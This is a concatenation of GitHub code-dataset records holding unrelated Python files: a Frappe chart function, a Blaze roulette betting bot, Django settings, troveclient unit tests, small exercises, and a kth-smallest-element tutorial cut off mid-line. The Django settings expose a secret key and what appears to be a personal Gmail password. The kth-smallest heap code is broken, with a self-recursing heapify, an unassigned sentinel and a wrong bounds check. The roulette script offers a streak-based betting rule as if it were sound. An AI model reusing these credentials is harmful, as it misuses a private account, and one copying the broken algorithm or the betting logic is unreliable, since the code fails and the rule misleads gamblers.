py\")\n\t#frappe.errprint(from_date)\n\t#frappe.errprint(to_date)\n\t#frappe.errprint(\"calling \")\n\tif from_date and to_date:\n\t\tstr2=\"select name,EXTRACT(month FROM expiry_date) as expiry_date from `tabSite Master` where expiry_date between '2013-12-25' and '2015-12-25'\"\n\t\t#frappe.errprint(str2)\n\t\tsubscription_details=frappe.db.sql(str2,as_list=1)\n\t\tfrappe.errprint(subscription_details)\n\t\treturn{\n\t\t\"order_total\": subscription_details\n\t }\n\telse:\n\t\tstr2=\"select name,EXTRACT(month FROM expiry_date) as expiry_date from `tabSite Master` where expiry_date is not null\"\n\t\t#frappe.errprint(str2)\n\t\tsubscription_details=frappe.db.sql(str2,as_list=1)\n\t\tfrappe.errprint(subscription_details)\n\t\treturn{\n\t\t\"order_total\": subscription_details\n\t }\n\n\t\t \n\n","repo_name":"rohitw1991/smarttailorfrappe","sub_path":"frappe/core/page/graphical_chart/graphical_chart.py","file_name":"graphical_chart.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"13377575425","text":"import time\r\nimport json\r\nfrom datetime import datetime\r\nimport requests\r\n\r\n\r\ndef get_blaze_data(url, save_file=True):\r\n r = requests.get(url)\r\n\r\n if save_file:\r\n save_data_to_file(r.text)\r\n return json.loads(r.text)\r\n\r\n# função que faz a requisição para o horário atual\r\n\r\n\r\ndef make_request(start_date=\"2023-04-23\", end_date=\"2023-04-24\", save_file=True):\r\n cur_hour = get_current_time_hour()\r\n print(cur_hour)\r\n url = f\"https://blaze.com/api/roulette_games/history?startDate={start_date}T{cur_hour}.000Z&endDate={end_date}T{cur_hour}.000Z&page=1\"\r\n\r\n r = requests.get(url)\r\n if save_file:\r\n save_data_to_file(r.text)\r\n return json.loads(r.text)\r\n\r\n\r\ndef save_data_to_file(data):\r\n with open(\"result.json\", \"w\") as f:\r\n f.write(data)\r\n\r\n\r\ndef get_current_time_hour():\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n return current_time\r\n\r\n\r\ndef get_total_pages(data):\r\n return data[\"totalPages\"]\r\n\r\n\r\ndef get_only_result_data(data):\r\n result = []\r\n for i, v in enumerate(data[\"records\"]):\r\n val = v[\"color\"]\r\n if i < 5:\r\n result.append(val)\r\n return result\r\n\r\n\r\ndef estrategia(result_array):\r\n color_count = 0\r\n last = None\r\n print(result_array)\r\n for color in result_array:\r\n if last == None:\r\n last = color\r\n if color == last:\r\n color_count += 1\r\n else:\r\n return color_count\r\n return color_count\r\n\r\n\r\nif __name__ == \"__main__\":\r\n while True:\r\n data = make_request()\r\n result = get_only_result_data(data)\r\n r_est = estrategia(result)\r\n if r_est == 5:\r\n print(\"5 seguidos da mesma cor. Entrada válida!\")\r\n if result[0] == \"red\":\r\n print(\"Aposta: black\")\r\n else:\r\n print(\"Aposta: red\")\r\n elif r_est == 3:\r\n print(\"3 seguidos. Aposta próxima!\")\r\n if result[0] == \"red\":\r\n print(\"Aposta: black\")\r\n else:\r\n print(\"Aposta: red\")\r\n time.sleep(27)\r\n","repo_name":"Eduard0MS/boot","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9815856627","text":"import csv \r\nfrom Coleccion import Coleccion\r\nfrom EContratado import EContratado\r\n \r\nif __name__=='__main__':\r\n \r\n cant=int(input(\"ingrese la cantidad de empleados a registrar \"))\r\n \r\n ManejaEmpleados=Coleccion(cant)\r\n ManejaEmpleados.cargaEmpleados()\r\n \r\n print(\"1. Registrar Horas\")\r\n print(\"2. Total de Tareas\")\r\n print(\"3. Ayuda Economica\")\r\n print(\"4. Calcular Sueldo\")\r\n \r\n op=int(input(\"ingrese la opcion a realizar: \"))\r\n \r\n while op != 0:\r\n if op == 1:\r\n dni=int(input(\"ingrese dni del empleado \"))\r\n horas=int(input(\"ingrese la cantidad de horas trabajadas: \"))\r\n empleado=ManejaEmpleados.buscaDNI()\r\n if empleado != False and isinstance(empleado,EContratado):\r\n empleado.incrementoHoras(horas) \r\n elif op == 2:\r\n tarea=input(\"ingrese la tarea a buscar: \")\r\n fecha=input(\"ingrese fecha actual: \")\r\n EmpleadoExterno=ManejaEmpleados.buscaTarea(tarea)\r\n confirmacion=ManejaEmpleados.verificaFecha(fecha,EmpleadoExterno)\r\n if EmpleadoExterno != False and confirmacion ==True:\r\n EmpleadoExterno.montoPagar()\r\n elif op == 3:\r\n ManejaEmpleados.ayudaSolidaria()\r\n elif op == 4:\r\n ManejaEmpleados.mostrarSueldo()\r\n else:\r\n print(\"opcion incorrecta. \")\r\n \r\n print(\"1. Registrar Horas\")\r\n print(\"2. Total de Tareas\")\r\n print(\"3. Ayuda Economica\")\r\n print(\"4. Calcular Sueldo\") \r\n \r\n op=int(input(\"ingrese la opcion a realizar: \"))\r\n \r\n \r\n ","repo_name":"Ignacio43/Ejercicio-4.U3","sub_path":"Ejercicio 4.U3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37577350577","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for frikr project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'wd9c_x9m4tz3w$l^m6$+wo+mfr&u*!em&@7)jjy&4e8=)qg^6m'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'photos',\n 'rest_framework'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'frikr.urls'\n\nWSGI_APPLICATION = 'frikr.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'es-es'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nLOGIN_URL = '/login'\n\n# REST Framework settings\nREST_FRAMEWORK = {\n 'PAGINATE_BY': 3, #indica los elemantos a mostrar por página\n 'PAGINATE_BY_PARAM': 'page_size', # permite definir al cliente el tamaño de paginación\n 'MAX_PAGINATE_BY': 10, # máximo número de items por página permitidos\n 'DEFAULT_RENDERER_CLASSES': (\n 'rest_framework.renderers.JSONRenderer',\n 'rest_framework.renderers.XMLRenderer',\n 'rest_framework.renderers.BrowsableAPIRenderer',\n #'rest_framework.renderers.YAMLRenderer',\n )\n}\n\n\n# Configuración de archivos media\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '/media/'\n\n\n# Configuración para depurar e-mail\n# python -m smtpd -n -c DebuggingServer localhost:1025\nEMAIL_HOST = '127.0.0.1'\nEMAIL_PORT = 1025\n\n# EMAIL_USE_TLS = True\n# EMAIL_HOST = 'smtp.gmail.com'\n# EMAIL_HOST_USER = 'antonio.jimenez2@gmail.com'\n# EMAIL_HOST_PASSWORD = 'No@violence13cig3cx6h'\n# EMAIL_PORT = 587\n","repo_name":"antjimar/Friker","sub_path":"frikr/frikr/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10242353439","text":"N,M=map(int,input().split())\nc=[[False]*(N+1) for _ in range(N+1)]\n\nfor i in range(M):\n u,m=map(int,input().split())\n c[u][m]=True\n c[m][u]=True\n \nans=0 \nfor i in range(1,N+1):\n for j in range(i+1,N+1):\n for k in range(j+1,N+1):\n if c[i][j] and c[j][k] and c[k][i]:\n ans+=1\n \nprint(ans)\n","repo_name":"gomatofu/atcoder","sub_path":"submissions/abc262/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"1706579864","text":"\"\"\"\nClass Fitness to treat the fitness as the inverse of the route distance. We want to minimize route distance, so a larger\nfitness score is better.\n\"\"\"\n\n\nclass Fitness:\n def __init__(self, route):\n self.route = route\n self.distance = 0\n self.fitness = 0.0\n\n def route_distance(self):\n if self.distance == 0:\n path_distance = 0\n for i in range(0, len(self.route)):\n from_city = self.route[i]\n if (i + 1) < len(self.route):\n to_city = self.route[i + 1]\n else:\n to_city = self.route[0]\n path_distance += from_city.distance(to_city)\n self.distance = path_distance\n return self.distance\n\n def route_fitness(self):\n if self.fitness == 0:\n self.fitness = 1 / float(self.route_distance())\n return self.fitness\n","repo_name":"NamizataS/Biomimetics_TPs","sub_path":"TP3/Fitness.py","file_name":"Fitness.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72611770671","text":"import contextlib\nimport os\nfrom unittest import mock\n\nimport testtools\n\nfrom troveclient.apiclient import exceptions\nfrom troveclient import base\nfrom troveclient import common\nfrom troveclient import utils\n\n\"\"\"\nUnit tests for base.py\n\"\"\"\n\nUUID = '8e8ec658-c7b0-4243-bdf8-6f7f2952c0d0'\n\n\ndef obj_class(self, res, loaded=True):\n return res\n\n\nclass BaseTest(testtools.TestCase):\n def test_getid(self):\n obj = \"test\"\n r = base.getid(obj)\n self.assertEqual(obj, r)\n\n test_id = \"test_id\"\n obj = mock.Mock()\n obj.id = test_id\n r = base.getid(obj)\n self.assertEqual(test_id, r)\n\n\nclass ManagerTest(testtools.TestCase):\n def setUp(self):\n super(ManagerTest, self).setUp()\n self.orig__init = base.Manager.__init__\n base.Manager.__init__ = mock.Mock(return_value=None)\n self.orig_os_makedirs = os.makedirs\n\n def tearDown(self):\n super(ManagerTest, self).tearDown()\n base.Manager.__init__ = self.orig__init\n os.makedirs = self.orig_os_makedirs\n\n def test___init__(self):\n api = mock.Mock()\n base.Manager.__init__ = self.orig__init\n manager = base.Manager(api)\n self.assertEqual(api, manager.api)\n\n def test_completion_cache(self):\n manager = base.Manager()\n\n # handling exceptions\n mode = \"w\"\n cache_type = \"unittest\"\n obj_class = mock.Mock\n with manager.completion_cache(cache_type, obj_class, mode):\n pass\n\n os.makedirs = mock.Mock(side_effect=OSError)\n with manager.completion_cache(cache_type, obj_class, mode):\n pass\n\n def test_write_to_completion_cache(self):\n manager = base.Manager()\n\n # no cache object, nothing should happen\n manager.write_to_completion_cache(\"non-exist\", \"val\")\n manager._mock_cache = mock.Mock()\n manager._mock_cache.write = mock.Mock(return_value=None)\n manager.write_to_completion_cache(\"mock\", \"val\")\n self.assertEqual(1, manager._mock_cache.write.call_count)\n\n def _get_mock(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n\n def side_effect_func(self, body, loaded=True):\n return body\n\n manager.resource_class = mock.Mock(side_effect=side_effect_func)\n return manager\n\n def test__get_with_response_key_none(self):\n manager = self._get_mock()\n url_ = \"test-url\"\n body_ = \"test-body\"\n resp_ = \"test-resp\"\n manager.api.client.get = mock.Mock(return_value=(resp_, body_))\n r = manager._get(url=url_, response_key=None)\n self.assertEqual(body_, r)\n\n def test__get_with_response_key(self):\n manager = self._get_mock()\n response_key = \"response_key\"\n body_ = {response_key: \"test-resp-key-body\"}\n url_ = \"test_url_get\"\n manager.api.client.get = mock.Mock(return_value=(url_, body_))\n r = manager._get(url=url_, response_key=response_key)\n self.assertEqual(body_[response_key], r)\n\n def test__create(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n\n response_key = \"response_key\"\n data_ = \"test-data\"\n body_ = {response_key: data_}\n url_ = \"test_url_post\"\n manager.api.client.post = mock.Mock(return_value=(url_, body_))\n\n return_raw = True\n r = manager._create(url_, body_, response_key, return_raw)\n self.assertEqual(data_, r)\n\n return_raw = False\n\n @contextlib.contextmanager\n def completion_cache_mock(*arg, **kwargs):\n yield\n\n mockl = mock.Mock()\n mockl.side_effect = completion_cache_mock\n manager.completion_cache = mockl\n\n manager.resource_class = mock.Mock(return_value=\"test-class\")\n r = manager._create(url_, body_, response_key, return_raw)\n self.assertEqual(\"test-class\", r)\n\n def get_mock_mng_api_client(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n return manager\n\n def test__delete(self):\n resp_ = \"test-resp\"\n body_ = \"test-body\"\n\n manager = self.get_mock_mng_api_client()\n manager.api.client.delete = mock.Mock(return_value=(resp_, body_))\n # _delete just calls api.client.delete, and does nothing\n # the correctness should be tested in api class\n manager._delete(\"test-url\")\n pass\n\n def test__update(self):\n resp_ = \"test-resp\"\n body_ = \"test-body\"\n\n manager = self.get_mock_mng_api_client()\n manager.api.client.put = mock.Mock(return_value=(resp_, body_))\n body = manager._update(\"test-url\", body_)\n self.assertEqual(body_, body)\n\n\nclass ManagerListTest(ManagerTest):\n def setUp(self):\n super(ManagerListTest, self).setUp()\n\n @contextlib.contextmanager\n def completion_cache_mock(*arg, **kwargs):\n yield\n\n self.manager = base.Manager()\n self.manager.api = mock.Mock()\n self.manager.api.client = mock.Mock()\n\n self.response_key = \"response_key\"\n self.data_p = [\"p1\", \"p2\"]\n self.body_p = {self.response_key: self.data_p}\n self.url_p = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(\n return_value=(self.url_p, self.body_p)\n )\n self.data_g = [\"g1\", \"g2\", \"g3\"]\n self.body_g = {self.response_key: self.data_g}\n self.url_g = \"test_url_get\"\n self.manager.api.client.get = mock.Mock(\n return_value=(self.url_g, self.body_g)\n )\n\n mockl = mock.Mock()\n mockl.side_effect = completion_cache_mock\n self.manager.completion_cache = mockl\n\n def tearDown(self):\n super(ManagerListTest, self).tearDown()\n\n def test_list_with_body_none(self):\n body = None\n li = self.manager._list(\"url\", self.response_key, obj_class, body)\n self.assertEqual(len(self.data_g), len(li))\n for i in range(0, len(li)):\n self.assertEqual(self.data_g[i], li[i])\n\n def test_list_body_not_none(self):\n body = \"something\"\n li = self.manager._list(\"url\", self.response_key, obj_class, body)\n self.assertEqual(len(self.data_p), len(li))\n for i in range(0, len(li)):\n self.assertEqual(self.data_p[i], li[i])\n\n def test_list_key_mapping(self):\n data_ = {\"values\": [\"p1\", \"p2\"]}\n body_ = {self.response_key: data_}\n url_ = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(return_value=(url_, body_))\n li = self.manager._list(\"url\", self.response_key,\n obj_class, \"something\")\n data = data_[\"values\"]\n self.assertEqual(len(data), len(li))\n for i in range(0, len(li)):\n self.assertEqual(data[i], li[i])\n\n def test_list_without_key_mapping(self):\n data_ = {\"v1\": \"1\", \"v2\": \"2\"}\n body_ = {self.response_key: data_}\n url_ = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(return_value=(url_, body_))\n li = self.manager._list(\"url\", self.response_key,\n obj_class, \"something\")\n self.assertEqual(len(data_), len(li))\n\n\nclass MangerPaginationTests(ManagerTest):\n\n def setUp(self):\n super(MangerPaginationTests, self).setUp()\n self.manager = base.Manager()\n self.manager.api = mock.Mock()\n self.manager.api.client = mock.Mock()\n self.manager.resource_class = base.Resource\n\n self.response_key = \"response_key\"\n self.data = [{\"foo\": \"p1\"}, {\"foo\": \"p2\"}]\n self.next_data = [{\"foo\": \"p3\"}, {\"foo\": \"p4\"}]\n self.marker = 'test-marker'\n self.limit = '20'\n self.url = \"http://test_url\"\n self.next_url = '%s?marker=%s&limit=%s' % (self.url, self.marker,\n self.limit)\n self.links = [{'href': self.next_url, 'rel': 'next'}]\n self.body = {\n self.response_key: self.data,\n 'links': self.links\n }\n self.next_body = {self.response_key: self.next_data}\n\n def side_effect(url):\n if url == self.url:\n return None, self.body\n # In python 3 the order in the dictionary is not constant\n # between runs. So we cant rely on the URL params to be\n # in the same order\n if ('marker=%s' % self.marker in url and\n 'limit=%s' % self.limit in url):\n self.next_url = url\n return None, self.next_body\n\n self.manager.api.client.get = mock.Mock(side_effect=side_effect)\n\n def tearDown(self):\n super(MangerPaginationTests, self).tearDown()\n\n def test_pagination(self):\n resp = self.manager._paginated(self.url, self.response_key)\n self.manager.api.client.get.assert_called_with(self.url)\n self.assertEqual('p1', resp[0].foo)\n self.assertEqual('p2', resp[1].foo)\n self.assertEqual(self.marker, resp.next)\n self.assertEqual(self.links, resp.links)\n self.assertIsInstance(resp, common.Paginated)\n\n def test_pagination_next(self):\n resp = self.manager._paginated(self.url, self.response_key,\n limit=self.limit, marker=self.marker)\n self.manager.api.client.get.assert_called_with(self.next_url)\n self.assertEqual('p3', resp[0].foo)\n self.assertEqual('p4', resp[1].foo)\n self.assertIsNone(resp.next)\n self.assertEqual([], resp.links)\n self.assertIsInstance(resp, common.Paginated)\n\n def test_pagination_error(self):\n self.manager.api.client.get = mock.Mock(return_value=(None, None))\n self.assertRaises(Exception, self.manager._paginated,\n self.url, self.response_key)\n\n\nclass FakeResource(object):\n def __init__(self, _id, properties):\n self.id = _id\n try:\n self.name = properties['name']\n except KeyError:\n pass\n try:\n self.display_name = properties['display_name']\n except KeyError:\n pass\n\n\nclass FakeManager(base.ManagerWithFind):\n resource_class = FakeResource\n\n resources = [\n FakeResource('1234', {'name': 'entity_one'}),\n FakeResource(UUID, {'name': 'entity_two'}),\n FakeResource('4242', {'display_name': 'entity_three'}),\n FakeResource('5678', {'name': '9876'})\n ]\n\n def get(self, resource_id):\n for resource in self.resources:\n if resource.id == str(resource_id):\n return resource\n raise exceptions.NotFound(resource_id)\n\n def list(self):\n return self.resources\n\n\nclass FindResourceTestCase(testtools.TestCase):\n def setUp(self):\n super(FindResourceTestCase, self).setUp()\n self.manager = FakeManager(None)\n\n def test_find_none(self):\n self.assertRaises(exceptions.CommandError,\n utils.find_resource,\n self.manager,\n 'asdf')\n\n def test_find_by_integer_id(self):\n output = utils.find_resource(self.manager, 1234)\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_str_id(self):\n output = utils.find_resource(self.manager, '1234')\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_uuid(self):\n output = utils.find_resource(self.manager, UUID)\n self.assertEqual(self.manager.get(UUID), output)\n\n def test_find_by_str_name(self):\n output = utils.find_resource(self.manager, 'entity_one')\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_str_displayname(self):\n output = utils.find_resource(self.manager, 'entity_three')\n self.assertEqual(self.manager.get('4242'), output)\n\n def test_find_by_int_name(self):\n output = utils.find_resource(self.manager, 9876)\n self.assertEqual(self.manager.get('5678'), output)\n\n\nclass ResourceTest(testtools.TestCase):\n def setUp(self):\n super(ResourceTest, self).setUp()\n self.orig___init__ = base.Resource.__init__\n\n def tearDown(self):\n super(ResourceTest, self).tearDown()\n base.Resource.__init__ = self.orig___init__\n\n def test___init__(self):\n manager = mock.Mock()\n manager.write_to_completion_cache = mock.Mock(return_value=None)\n\n info_ = {}\n robj = base.Resource(manager, info_)\n self.assertEqual(0, manager.write_to_completion_cache.call_count)\n\n info_ = {\"id\": \"id-with-less-than-36-char\"}\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(0, manager.write_to_completion_cache.call_count)\n\n id_ = \"id-with-36-char-\"\n for i in range(36 - len(id_)):\n id_ = id_ + \"-\"\n info_ = {\"id\": id_}\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(1, manager.write_to_completion_cache.call_count)\n\n info_[\"name\"] = \"test-human-id\"\n # Resource.HUMAN_ID is False\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertIsNone(robj.human_id)\n self.assertEqual(2, manager.write_to_completion_cache.call_count)\n\n # base.Resource.HUMAN_ID = True\n info_[\"HUMAN_ID\"] = True\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(info_[\"name\"], robj.human_id)\n self.assertEqual(4, manager.write_to_completion_cache.call_count)\n\n def test_human_id(self):\n manager = mock.Mock()\n manager.write_to_completion_cache = mock.Mock(return_value=None)\n\n info_ = {\"name\": \"test-human-id\"}\n robj = base.Resource(manager, info_)\n self.assertIsNone(robj.human_id)\n\n info_[\"HUMAN_ID\"] = True\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"name\"], robj.human_id)\n robj.name = \"new-human-id\"\n self.assertEqual(\"new-human-id\", robj.human_id)\n\n def get_mock_resource_obj(self):\n base.Resource.__init__ = mock.Mock(return_value=None)\n robj = base.Resource()\n robj._loaded = False\n return robj\n\n def test__add_details(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n self.assertEqual(info_[\"name\"], robj.name)\n self.assertEqual(info_[\"test_attr\"], robj.test_attr)\n\n def test___getattr__(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n self.assertEqual(info_[\"test_attr\"], robj.__getattr__(\"test_attr\"))\n\n # TODO(dmakogon): looks like causing infinite recursive calls\n # robj.__getattr__(\"test_non_exist_attr\")\n\n def test___repr__(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n\n expected = \"\"\n self.assertEqual(expected, robj.__repr__())\n\n def test_get(self):\n robj = self.get_mock_resource_obj()\n manager = mock.Mock()\n manager.get = None\n\n robj.manager = object()\n robj._get()\n\n manager = mock.Mock()\n robj.manager = mock.Mock()\n\n robj.id = \"id\"\n new = mock.Mock()\n new._info = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj.manager.get = mock.Mock(return_value=new)\n robj._get()\n self.assertEqual(\"test-human-id\", robj.name)\n self.assertEqual(5, robj.test_attr)\n\n def test___eq__(self):\n robj = self.get_mock_resource_obj()\n other = base.Resource()\n\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._info = info_\n other._info = {}\n self.assertFalse(robj.__eq__(other))\n\n robj.id = \"rid\"\n other.id = \"oid\"\n self.assertFalse(robj.__eq__(other))\n\n other.id = \"rid\"\n self.assertTrue(robj.__eq__(other))\n\n # not instance of the same class\n other = mock.Mock()\n self.assertEqual(robj.__eq__(other), NotImplemented)\n\n def test_is_loaded(self):\n robj = self.get_mock_resource_obj()\n robj._loaded = True\n self.assertTrue(robj.is_loaded)\n\n robj._loaded = False\n self.assertFalse(robj.is_loaded)\n","repo_name":"openstack/python-troveclient","sub_path":"troveclient/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":16696,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"38"} +{"seq_id":"32918461565","text":"#!/usr/bin/env python3\r\n\r\nimport argparse\r\nimport json\r\n\r\nfrom changes import MixtapeChanges\r\nfrom mixtapes import NaiveMixtape, OptimizedMixtape\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser('Apply some changes')\r\n parser.add_argument('-i', '--input', dest='input_file', required=True, help='Input filename')\r\n parser.add_argument('-o', '--changes', dest='changes_file', required=True, help='Changes filename')\r\n return parser.parse_args()\r\n\r\n\r\ndef load_files(arguments):\r\n in_file = json.load(open(arguments.input_file))\r\n change_file = json.load(open(arguments.changes_file))\r\n return in_file, change_file\r\n\r\n\r\nif __name__ == '__main__':\r\n args = get_args()\r\n input_file, changes_file = load_files(args)\r\n\r\n mixtape = NaiveMixtape(input_file)\r\n mixtape_changes = MixtapeChanges(changes_file)\r\n\r\n mixtape.apply(mixtape_changes)\r\n output = json.dumps(mixtape.mixtape, indent=4)\r\n print(output)\r\n","repo_name":"KenAdamson/highspot-test","sub_path":"apply.py","file_name":"apply.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30737934273","text":"\"\"\"\nKth smallest element in a row-wise and column-wise sorted 2D array\n\nGiven an n*n matrix where every row and column is sorted in non-decreasing order. \nFind the kth smallest element in the given 2D array.\n\nExample, \n\nInput:k = 3 and array =\n 10, 20, 30, 40\n 15, 25, 35, 45\n 24, 29, 37, 48\n 32, 33, 39, 50 \nOutput: 20\nExplanation: The 3rd smallest element is 20 \n\nInput:k = 7 and array =\n 10, 20, 30, 40\n 15, 25, 35, 45\n 24, 29, 37, 48\n 32, 33, 39, 50 \nOutput: 30\n\nApproach:\n\nThe idea is to find the kth minimum element. Each row and each column is sorted. So it can be\nthough as C sorted lists and the lists have to be merged into a single list, the kth\nelement of the list has to be found out. So the approach is similar, the only difference is\nthe kth element is found the loop ends.\n\nAlgorithm:\n1. Use min heap - create min-heap to store the elements\n2. Traverse the first row from start to end and build a min heap of elements from first row.\nA heap entry also stores row number and column number\n3. Now run a loop k times to extract min element from heap in each iteration\n4. Get minimum element or root from Min-Heap.\n5. Find row number and column number of the minimum element.\n6. Replace root with next element from same column and min-heapify the root.\n7. print the last extracted element, which is the kth minimum element.\n\n\nTime Complexity: \n\nThe solution involves following steps. \nBuilding a min-heap which takes O(n) time\nHeapify k times which takes O(k Logn) time.\n\nSpace Complexity: \nO(R), where R is the length of a row, as the Min-Heap stores one row at a time.\nThis code can be optimized to build a heap of size k when k is smaller than n. \nIn that case, the kth smallest element must be in first k rows and k columns. \n\nThis code can be optimized to build a heap of size k when k is smaller than n. In that case,\nthe kth smallest element must be in first k rows and k columns.\n\n\"\"\"\n\n# program fro kth largest element in a 2d array sorted row-wise and column-wise\nfrom sys import maxsize\n\n# A structure to store an entry of heap. The entry contains a value from 2D array, row and\n# column numbers of the value\n\nclass HeapNode:\n def __init__(self, val, r, c):\n self.val =val # value to be stored\n self.r = r # Row number of value in 2D array\n self.c = c # Column number of value in 2D array\n\n# A utility function to minheapify the node harr[i] of a heap stored in harr[]\ndef minHeapify(harr, i, heap_size):\n l = i * 2 + 1\n r = i * 2 + 2\n smallest = i\n \n if l < heap_size and harr[l].val < harr[i].val:\n smallest = l\n\n if r < heap_size and harr[r].val == 0:\n minHeapify(harr, i, heap_size)\n # minHeapify(harr, i, n)\n i -= 1\n\n# This function returns kth smallest element in a 2D array mat[][]\ndef kthSmallest(mat, n, k):\n \n # k must be greater than 0 and smaller than n*n\n if k > 0 and n*n < k:\n return maxsize\n \n # create a min heap of elements from first row of 2D array\n harr = [0] * n\n \n for i in range(n):\n harr[i] = HeapNode(mat[0][i], 0, i)\n \n # buildHeap(harr, n)\n\n hr = HeapNode(0, 0, 0)\n\n for i in range(k):\n \n # Get current heap root\n hr =harr[0]\n\n # Get next value from column of root's value. If the value stored at root was last \n # value in its column, then assign INFINITE as next value\n \n if(hr.r < n - 1):\n nextval = mat[hr.r + 1][hr.c]\n\n else:\n maxsize\n\n # update heap root with next value\n harr[0] = HeapNode(nextval, hr.r + 1, hr.c)\n\n # heapify root\n minHeapify(harr, 0, n)\n\n # Return the value at last extracted root\n return hr.val\n \nif __name__==\"__main__\":\n mat = [[10, 20, 30, 40],\n [15, 25, 35, 45],\n [25, 29, 37, 48],\n [32, 33, 39, 50]]\n print(\"7th smallest element is\", kthSmallest(mat, 4, 7))\n\n\n# expected output: 7th smallest element is 30\n\n\n\"\"\"\nBinary Search over the Range:\n\nThis approach uses binary search to iterate over possible solutions. We know that\n1. answer >= mat[0][0]\n2. answer <= mat[N-1][N-1]\n\nSo, we do a binary search on this range and in each iteration determine the no of elements\ngreater than or equal to our current middle element. The elements greater than or equal to \ncurrent element can be found in O(log(n)) time using binary search.\n\"\"\"\n# This returns count of elements in matrix less than or equal to num\ndef getElementsGreaterThanOrEqual(num, n, mat):\n ans = 0\n for i in range(n):\n # if num is less than the first element then no more element in matrix further are \n # less than or equal to num\n if(mat[i][0] > num):\n return ans\n # if num is greater than last element, it is greater than all elements in that row\n if(mat[i][n-1] <= num):\n ans += n\n continue\n # This contain the col inde of last element in matrix less than or equal to num\n greaterThan = 0\n jump = n // 2\n while(jump >= 1):\n while(greaterThan + jump < n and mat[i][greaterThan + jump] <= num):\n greaterThan += jump\n jump //=2\n\n ans += greaterThan +1\n return ans\n\n# returns kth smallest index in the matrix\ndef kthSmallest(mat, n, k):\n # We know the answer lies between the first and the last element, so, do a binary search\n # on answer based on the number of elements our current elements is greater than \n # the elements in the matrix\n l, r =mat[0][0], mat[n-1][n-1]\n\n while(l <= r):\n mid = l + (r 